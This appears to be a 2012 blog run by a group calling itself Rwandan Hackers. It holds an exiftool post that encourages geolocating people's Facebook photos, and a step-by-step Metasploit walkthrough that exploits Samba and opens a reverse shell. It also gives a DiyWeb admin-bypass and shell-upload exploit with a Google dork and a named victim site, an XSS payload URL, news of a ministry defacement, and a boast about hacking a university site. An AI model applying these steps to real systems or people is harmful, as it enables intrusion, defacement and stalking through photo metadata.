Saturday, September 15, 2012

Extracting MetaData from photos using exiftool

                                              Hello Rwandans !!!!!

In this post I will show you how to extract metadata from photos to see exactly where you took the photo


Also note that this method is used to solve many "crimes" for conducting a forensic analysis of an image, you can get the REAL data and the EXACT time and date, time, location, name of the camera, the date of issuance if the image was edited and all other options in it,
which leads to achieving tangible results

So the tools is located in the menu structure under Digital Forensics, or through the:

Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool

The image I used is called fotografia.jpg is in the images folder

The route is as follows: ~ / images / fotografia.jpg

The command is:. / Exiftool-a ~ / images / fotografia.jpg
You can see a lot of data, such as the date and time the image was taken and everything else I mentioned above, in addition to the photo was taken from a SAMSUNG


In this case, we want to know the location of where the photo was taken, if you copy the GPS data, which are:

GPS Latitude: 42 ° 24 '54 .91 "N
GPS Longitude: 83 deg 25 '21 .36 "W
GPS: 42 ° 24 '54 .91 "N, 83 ° 25 '21 .36" W


As we can see, this photo was taken at Laurel Park Dr Livonia, MI 48152, USA
A cool thing to do is take pictures of Facebook and use this method to find GPS coordinates.


Enjoy

                                                          RWANDAN HACKERS


Exploiting Samba Server On Backtrack 5



Aim
-The main aim of this tutorial is to exploit the samba server .
Indentifying Samba Services
To Identifying Samba Services running on Remote System we use nmap .
Command Used : nmap -sV 192.168.118.138
After scanning , it shows the port 139 and port 445 uses Samba services .
See the below image for more details -



Msfconsole
Open msfconsole through a terminal .
Command Used : msfconsole
After enter the command, your ' msfconsole ' will open as shown below

Search Samba Exploit
To Search Samba Exploit , enter the command given below -
Commans Used to search samba exploit : search samba
As you press enter key , it shows the different exploits related to samba .
From the exploits select one which is highlighted in the below image -
See the below image for more help  

Use Exploit
Exploit Used : use exploit/multi/samba/usermap_script
See the below image for more details



Show Options
Command Used : show options
This command shows that RHOST is not set . So the next step is to set the Remote Host .
See the below image for more details


Rhost
Command Used : set RHOST <Remote Ip Address >
See the below image for more details



Payload
Command Used : show payloads
See the below image and  set the highlighted payload.
See the below image for more details





Set Payload
Command Used : set payload cmd/unix/reverse


Show Options
Command Used : show options
Now set the LHOST (local host address)




Set LHOST
Command Used : set LHOST < Your IpAddress >



Lport
Command Used > set LPORT 445





Command Used
After getting session , you can use commands as shown below -
See the below image -







Monday, September 3, 2012

A picture of President Kagame of Rwanda labelled a war criminal by the hackers into the Agriculture Ministry website

A picture of President Kagame of Rwanda labelled a war criminal by the hackers into the Agriculture Ministry website


The ministry of agriculture website has been pulled down after hackers infiltrated it and posted messages calling for presidents Yoweri Museveni of Uganda and Paul Kagame of Rwanda to stop supporting war in the Democratic Republic of Congo. Story (3 Files) The ministry of agriculture website has been pulled down after hackers infiltrated it and posted messages calling for presidents Yoweri Museveni of Uganda and Paul Kagame of Rwanda to stop supporting war in the Democratic Republic of Congo.

The hackers, one of whom identifying himself as Jeannot Kabuya, posted a string of statements written in French and calling for an end to the violence in DR Congo.

Some of the messages posted on the site, www.agriculture.go.ug, say Congo is not for sale.

The hackers also posted a string of pictures labeling the two presidents as well as Congolese rebel leader Bosco Ntaganda as killers who are wanted for war crimes. Ntaganda has been heading the M23 rebels who in April this year launched a rebellion against the Joseph Kabila government.

Other messages posted on the site says the hackers are anonymous, they do not forgive and they do not forget.

Connie Achayo, the agriculture ministry spokesperson says that they have decided to pull down the website as they investigate the origin of the messages and possible motive of the hackers.

Fred Opolot the director at the Uganda Media Centre says he is aware of the move by hackers but is getting in touch with the public relations officer at the ministry of agriculture to pull down the site.

Earlier, Information minister Mary Karooro Okurut said she was not aware of the development but was getting in touch with the ministry officials to furnish her with details.

President Kagame of Rwanda and Kabila of DR Congo are expected to meet Museveni in Kampala on Tuesday this week to try and ease tension in the region. Congo accuses Rwanda of supporting the M23 rebels, a claim Rwanda dismisses.

On February 29th this year, the website of the Ministry of Works was briefly pulled down after a hacker posted a picture of FDC leader Kizza Besigye seated on a stool in a pensive mood. The image stayed on the site for several hours until the website was pulled down at about 5pm.

In May 2010, a hacker going by name Kaka Argentine posted a photo of Adolf Hitler with a Nazi party symbol on his chest on the State House website. In 2010, hackers calling themselves “the Ayyildiz team” posted pro-Palestine items on the website of the Ministry of Defence, accusing Israel of killing innocent Palestinians.

Thursday, August 30, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit


Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp

Dork : "Power by DiyWeb"
            inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
This exploit's almost all vulnerable websites are Malaysiyan.
To upload your files Goto : http://www.website.com/diyweb/menu/admin/image_manager.asp

and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites
Link:http://www.famosapadu.com.my/images/index.html

Google website's Vulnerable to XSS

Link:http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert%28%27XSS-BY-RWANDAN-HACKERS%27%29%3C/script%3E

we discovered a cross site scripting(XSS)
vulnerability in google website.we already reported the vulnerability to google security expert

Wednesday, August 29, 2012

Biochemistry - Makerere University website HACKED !!!

 Link:http://biochemistry.mak.ac.ug/start/index.php
Makerere University Department Of Biochemistry hacked by Rwandan Hackers
Dedications to "UGANDAN HACKERS"

                                                            ADMIN PANEL